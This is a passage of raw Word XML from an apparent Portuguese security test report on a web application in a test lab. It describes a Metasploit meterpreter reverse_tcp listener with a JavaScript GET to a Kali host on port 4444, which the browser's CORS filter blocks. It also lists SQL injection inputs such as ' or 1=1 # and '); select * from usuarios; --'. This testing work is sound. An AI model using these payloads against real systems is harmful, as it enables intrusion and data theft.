          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">trada na tela Cadastro Lotes </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>na Iteração 3.</w:t>
      </w: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 partir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 xml:space="preserve"> do browser Iceweasel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a máquina virtual</w:t>
      </w:r>
      <w:r w:rsidR="002A5945" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizada para testes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abrir uma conexão </w:t>
      </w:r>
      <w:r w:rsidR="002A5945" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com a máquina 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7D3513" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorad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utilizando </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>um listener da ferramenta Metasploit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. Dessa forma, obter acesso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o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="00185392" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009A30BC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00185392" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> máquina </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D602EF" w:rsidRPr="00D56FE7" w:rsidRDefault="00D602EF" w:rsidP="00AC10DC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="33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Passos</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> executados</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7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417AE8" w:rsidRDefault="008C6DC7" w:rsidP="00417AE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7AE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Através do exploit disponível em </w:t>
      </w:r>
      <w:r w:rsidRPr="00417AE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit/Multi/Handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00417AE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com o payload windows-meterpreter-reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00417AE8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usar o Metasploit para abrir um listener na porta 444 da máquina virtual </w:t>
      </w:r>
      <w:r w:rsidR="00DD2E6C" w:rsidRPr="00417AE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizada para testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00417AE8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417AE8" w:rsidRDefault="008C6DC7" w:rsidP="00417AE8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17AE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Usar um comando GET de Javascript para abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual </w:t>
      </w:r>
      <w:r w:rsidR="00185392" w:rsidRPr="00417AE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizada para testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00417AE8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sa fo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rma, será criado um listener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ica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ouvindo conexões. Quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidR="008176F3" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado para abri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uma conexão reversa da máquina atacada para a máquina atacante.</w:t>
      </w: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ódigo abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  do</w:t>
      </w:r>
      <w:r w:rsidR="00BD4B9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tipo GET para IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali_linux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de forma assíncrona. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B2A0B" w:rsidRPr="00D56FE7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&lt;script&gt;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r = new XMLHttpRequest(); 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r.open("GET",’http://IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00546C53" w:rsidRPr="00546C53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_kali_linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:4444’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685A02" w:rsidRPr="00685A02" w:rsidRDefault="008C6DC7" w:rsidP="00685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5A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w: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D56FE7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</w:t>
      </w:r>
      <w:r w:rsidR="00DD2E6C" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a máquina que hospeda o sistema não permita qu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a </w:t>
      </w:r>
      <w:r w:rsidR="00DD2E6C" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessão do Meterpreter seja a</w:t>
      </w:r>
      <w:r w:rsidR="001F6642" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>berta. E consequentemente, não haja acesso ao sistema operacional da máquina que hospeda a aplicação.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602EF" w:rsidRPr="00D56FE7" w:rsidRDefault="001F66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D4B94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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD4B94" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> navegador bloqueia a requisição</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando o filtro de CORS [6</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00BD4B9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Não foi possíve</w:t>
      </w:r>
      <w:r w:rsidR="001E6279" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>l realizar o teste com êxito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.</w:t>
      </w:r>
      <w:r w:rsidR="001E6279" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pois c</w:t>
      </w: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onforme mostra a figura 22, o browser Iceweasel bloqueia a requisição usando o filtro de CORS [6]</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75"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7F363BD1" wp14:editId="5EA1ACBF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>139065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-381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2</w:t>
      </w:r>
      <w:r w:rsidR="00BD4B94" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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Erro exibido no navegador na execução da requisição usando o filtro de CORS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685A02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A30BC" w:rsidRPr="00D56FE7" w:rsidRDefault="009A30B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Default="009A30B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Repetir os procedimentos realizados na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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, entretanto na máquina virtual de testes utiliza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 navegador diferente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do Iceweasel</w:t>
      </w:r>
      <w:r w:rsidR="001E6279" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, nesse caso o Firefox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, para descobrir se o bloqueio da conexão ocorre apenas no Iceweasel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685A02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E6279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sessão do Meterpreter seja aberta. E consequentemente, não haja acesso ao sistema operacional da máquina que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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B2A0B" w:rsidRPr="00D56FE7" w:rsidRDefault="001B2A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</w:t>
      </w:r>
      <w:r w:rsidR="00863ADF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>latório da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yellow"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Ao utilizar o navegador Firefox, o filtro de CORS impede a conexão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6279" w:rsidRPr="00D56FE7" w:rsidRDefault="001E6279" w:rsidP="001E627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  <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Não foi possível realizar o teste com êxito. Pois conforme mostra a figura 23, o browser Firefox bloqueia a requisição usando o filtro de CORS [6]</w:t>
      </w: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1E6279" w:rsidRPr="00D56FE7" w:rsidRDefault="001E627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85A02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685A0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 wp14:anchorId="10A45C0B" wp14:editId="0C6BDF40">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>243840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-970280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 2</w:t>
      </w:r>
      <w:r w:rsidR="001E6279" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3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Navegador Firefox impede a conexão quando o filtro de CORS é utiliza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63ADF" w:rsidP="00863ADF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4.2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Tela Cadastro Servidor – Exploração via SQL Injection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Tarefa realizada dia 26/04/16.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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página Cadastro Servidor</w:t>
      </w:r>
      <w:r w:rsidR="00F06499" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Então executar sessões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F06499" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s para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forçar ações não autorizadas no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="005824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1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Verificar se o campo “</w:t>
      </w:r>
      <w:r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Pr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” é vulnerável a i</w:t>
      </w:r>
      <w:r w:rsidR="003F1C5E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">njeção de código SQL utilizando </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417AE8" w:rsidRDefault="00417AE8" w:rsidP="00417AE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17AE8" w:rsidRPr="00D56FE7" w:rsidRDefault="00417AE8" w:rsidP="00417AE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ntrada: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417AE8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D56FE7" w:rsidRDefault="008C6DC7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8247A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2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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários </w:t>
      </w:r>
      <w:r w:rsidR="004F298F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cadastrados. Comentários inline, como “#” e “--” </w:t>
      </w:r>
      <w:r w:rsidR="0040482C" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>serão</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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ste ‘ or 1=1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este ‘ or 1=1  #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F298F" w:rsidRDefault="004F298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4F298F" w:rsidRPr="00D56FE7" w:rsidRDefault="00B846D4" w:rsidP="004F298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que o sistema realize o tratamento dos caracteres para impedir que os comentários inline </w:t>
      </w:r>
      <w:r w:rsidR="004F298F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modifiquem a instrução de consulta utilizada pela aplicação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F298F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E8" w:rsidRDefault="00417AE8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3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É possível que a tela utilize Javascript para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, o funcionamento do Javascript foi desab</w:t>
      </w:r>
      <w:r w:rsidR="009E4891" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ilitado no browser utilizado para testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Após isso</w:t>
      </w:r>
      <w:r w:rsidR="009E4891" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foram repetidos os procedimentos das </w:t>
      </w:r>
      <w:r w:rsidR="009E4891" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessões</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s 1 e 2.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Entradas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 xml:space="preserve">teste ‘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teste ‘ or 1=1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teste ‘ or 1=1 #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B846D4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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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E4891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ada aconteceu. Com o Javascript desabilitado no navegador a página não realizou nenhuma requisição.</w:t>
      </w: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4 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Com a função de Javascript habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções SQL no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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Entradas: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1231 ); select * from usuarios; --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56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>); select * from usuarios; #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17AE8" w:rsidRPr="00A5289A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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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38E7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Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida ao campo “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Entretanto, devido à falta de tratamento adequado para dados inválidos no campo “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” o seguinte erro foi exibido:</w:t>
      </w:r>
      <w:r w:rsidR="00F338E7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A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1.</w:t>
      </w:r>
